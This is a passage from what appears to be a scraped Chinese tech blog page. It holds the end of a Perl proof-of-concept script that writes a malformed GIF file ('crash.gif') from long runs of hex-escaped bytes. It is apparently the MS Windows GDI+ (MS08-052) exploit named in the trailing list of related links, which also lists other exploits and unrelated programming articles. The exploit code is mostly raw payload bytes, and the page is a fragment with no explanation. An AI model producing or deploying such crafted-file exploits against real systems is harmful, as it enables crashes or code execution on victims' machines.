"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#3
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#4
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
"/x00". # Terminator
"/x3B". # Trailer
open(out, "> crash.gif");
binmode(out);
print (out $gif);
close(out);
- MS Windows GDI+ Proof of Concept (MS08-052) #2
- POC(proof-of-concept)
- POC(proof-of-concept)
- POC [Proof of Concept] 原型 / 概念证明
- LDAP injection proof of concept exploit.
- POC [Proof of Concept] 原型 / 概念证明
- Proof of concept (POC) 即 概念原型
- IIS 5.0 WebDAV - Proof of concept - shellcode included
- Sendmail <= 8.12.8 prescan() proof of concept BSD exploit
- Win2K Kernel Hidden Process/Module Checker 0.1 (Proof-Of-Concept)
- Win2K/XP SDT Restore 0.2 (Proof-Of-Concept)
- AntiHookExec Version 1.0 (Anti API Hooking Proof-Of-Concept)
- Microsoft Word Document Code Execution Proof of Concept
- odak Image Viewer TIF/TIFF Code Execution Proof Of Concept
- MS06-040 Remote Code Execution Proof of Concept
- MS06-040 Remote Code Execution Proof of Concept
- MS11-077: From Patch to Proof-of-Concept
- 关于POC,基本概念 - Proof of Concept的缩写,意思是为观点提供证据
- 合并 GridView 的单元格总结
- 模式匹配中的kmp算法
- CPL文件
- 更新整个库中所有表的指定字段名称
- MS08-052 WMF漏洞分析及漏洞测试
- MS Windows GDI+ Proof of Concept (MS08-052) #2
- MS Windows 2003 Token Kidnapping Local Exploit PoC
- ADOTestMSSQL
- ASP.NET自定义控件属性的特性大全
- VS2005:开发工具技巧荟萃(随时更新)
- XFire:轻松简单地开发Web Services
- VB.NET按字节截取字符串
- sizeof内存对齐和虚指针内存布局
- bean:write 格式化
